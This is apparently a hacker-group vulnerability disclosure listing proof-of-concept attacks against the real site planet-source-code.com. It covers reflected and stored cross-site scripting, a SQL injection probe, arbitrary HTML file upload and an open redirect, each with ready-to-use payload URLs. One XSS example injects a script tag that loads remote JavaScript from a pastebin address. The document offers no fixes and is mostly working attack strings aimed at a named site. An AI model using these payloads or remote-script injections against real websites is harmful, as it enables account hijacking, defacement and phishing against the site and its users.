Planet Source Code XSS / SQL Injection / Shell Upload

#Title : Planet Source Code - Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 15 November 2014
#Category : Web Applications
#Vendor : http://planet-source-code.com
#Greetz : newbie-security.or.id | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets

============================================================================================

Remote Cross Site Scripting
Location : vb/scripts/BrowseCategoryOrSearchResults.asp
Parameter : txtCriteria

Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

POC :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING]

Example :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT>

===========================================================================================

Stored Cross Site Scripting

POC :

1. You Must Register or Login to Planet-Source-Code
2. After Login, Go to Link :
http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8

Input your Script Cross Site Scripting at Textbox Job Title,Company,Description

3. View your Cross Script Scripting at :
http://planet-source-code.com/vb/jobs/ListJobs.asp

=============================================================================================

Cross Site Scripting

Location : vb/scripts/voting/VoteLog.asp
Parameter : txtCodeName

POC :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0

Example :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0

===============================================================================================

Possible SQL Injection

Location : vb/jobs/ListJobs.asp
Parameter : txtMaxNumberOfEntriesPerPage

POC :
http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10'

================================================================================================

Arbitrary File Upload

POC :

1. You Must Register or Login to Planet Source Code
2. After Login, Go to Link
http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE

3. Upload your File TXT or HTML in Upload Button
4. After Upload File, see your file at :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOME_NAME].html

Example :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html

=====================================================================================================

URL Redirection

POC :
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL]

Example :

http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/